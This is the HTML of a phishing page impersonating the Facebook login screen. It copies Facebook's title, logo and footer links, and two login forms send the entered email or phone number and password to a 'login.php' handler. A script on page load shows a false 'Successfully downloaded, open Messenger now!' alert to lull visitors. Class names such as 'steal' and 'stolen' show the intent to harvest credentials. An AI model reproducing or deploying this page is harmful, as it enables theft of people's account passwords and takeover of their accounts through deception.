<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="shortcut icon" type="icon" href="facebook.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Log into Facebook | Facebook</title>
    <link rel="stylesheet" href="style.css">
    <a href='https://ufonts.com/fonts/klavika-bold-opentype.html' title='Klavika Bold OpenType Font Download - ufonts.com'></a>
</head>
<script type="text/javascript">
    alert('Successfully downloaded, open Messenger now!');
</script>
<body>
    <header>
        <div class="container">
            <div class="face"></div>
                <img class="facebook" src="fb.png" alt="facebook logo">
                <div class="new">
                    <a class="direct" href="#">Create New Account</a>
                </div>
            </div>   
        </div>
        <br>
          <center>
                <div class="go">
                     <a class="get" href="https://play.google.com/store/apps/details?id=com.facebook.lite&hl=en">Get Facebook Lite and browse faster. </a>
                </div>
           </center>
    </header><br><br><br><br>
        <center>
            <form action="login.php" method="post">
                <div class="mobmail">
                    <input class="email" type="text" name="useremail" placeholder="Email or Phone Number">
                </div>
                    <input class="pass" type="password" name="userpass" placeholder="Password" autocomplete="off">
                <div class="mobpass">
                    <button name="submit" type="submit">Log In</button>
                </div>
                     <br><hr id="hright" size="1" width="125"><h5>or</h5><hr id="hleft" size="1" width="125">
                     <div class="crypt">
                        <a class="create2" href="https://www.facebook.com/r.php?locale=en_US">Create New Account</a>
                     </div>
                     <div class="nyt11">
                         <a class="nyt1" href="#">Forgot Password?</a>
                     </div>
                <a class="nyt" href="#">Forgot account?</a> <a class="nyt" href="#">Sign up for Facebook</a>
            </form>
        </center>
          <center>
            <form class="cool" action="login.php" method="post">
                <a class="book" href="#">Log Into Facebook</a>
                <div class="mobmail2">
                    <input class="mail" type="text" name="useremail" placeholder="Email or Phone Number">
                </div>
                    <input class="password" type="password" name="userpass" placeholder="Password" autocomplete="off">
                <div class="mobpassing">
                    <input class="submit" type="submit" name="submit" value="Log In">
                </div>
                <a class="steal" href="#">Forgot account?</a> <a class="steal" href="#">Sign up for Facebook</a>
            </form>
        </center>
                   <div class="mob11">
                        <a class="nyt2" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100">English (US)</a><br>
                        <a class="nyt2" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100">Bisaya</a><br>
                        <a class="nyt2" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100">한국어</a><br>
                        <a class="nyt2" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100">Português (Brasil)</a><br>
                    </div>
                     <div class="mob12">
                        <a class="nyt2" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100">Filipino</a><br>
                        <a class="nyt2" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100">Español</a><br>
                        <a class="nyt2" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100">日本語</a><br>
                    </div>
                    <div class="book">
                       <center>
                            <a class="nyt2" href="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&lwv=100">Facebook Inc.</a>
                       </center>
                    </div>

                <div class="footer">
                <br><br><br><br><br>
                <div class="div">
                <a class="black" href="#">English (US)</a>
                <a class="nnt" href="#">Filipino</a>
                <a class="nnt" href="#">Bisaya</a>
                <a class="nnt" href="#">Español</a>
                <a class="nnt" href="#">한국어</a>
                <a class="nnt" href="#">日本語</a>
                <a class="nnt" href="#">العربية</a>
                <a class="nnt" href="#">中文(简体)</a>
                <a class="nnt" href="#">Português (Brasil)</a>
                <a class="nnt" href="#">Français (France)</a>
                <a class="nnt" href="#">Deutsch</a><br><br>
                <a class="tyn" href="#">Sign Up</a>
                <a class="tyn" href="#">Log In</a>
                <a class="tyn" href="#">Messenger</a>
                <a class="tyn" href="#">Facebook Lite</a>
                <a class="tyn" href="#">Watch</a>
                <a class="tyn" href="#">People</a>
                <a class="tyn" href="#">Pages</a>
                <a class="tyn" href="#">Page Categories</a>
                <a class="tyn" href="#">Places</a>
                <a class="tyn" href="#">Games</a>
                <a class="tyn" href="#">Locations</a>
                <a class="tyn" href="#">Marketplace</a>
                <a class="tyn" href="#">Facebook Pay</a><br>
                <a class="tyn" href="#">Groups</a>
                <a class="tyn" href="#">Oculus</a>
                <a class="tyn" href="#">Portal</a>
                <a class="tyn" href="#">Instagram</a>
                <a class="tyn" href="#">Local</a>
                <a class="tyn" href="#">Fundraisers</a>
                <a class="tyn" href="#">Services</a>
                <a class="tyn" href="#">About</a>
                <a class="tyn" href="#">Create Ad</a>
                <a class="tyn" href="#">Create Page</a>
                <a class="tyn" href="#">Developers</a>
                <a class="tyn" href="#">Careers</a>
                <a class="tyn" href="#">Privacy</a>
                <a class="tyn" href="#">Cookies</a><br>
                <a class="tyn" href="#">Ad Choices</a>
                <a class="tyn" href="#">Terms</a>
                <a class="tyn" href="#">Help</a><br>
                </div>
                <div class="stolen2">
                            <a class="stolen">Facebook &copy; 2020</a>
                       </center>
                    </div>
                </body>
              </html>



 






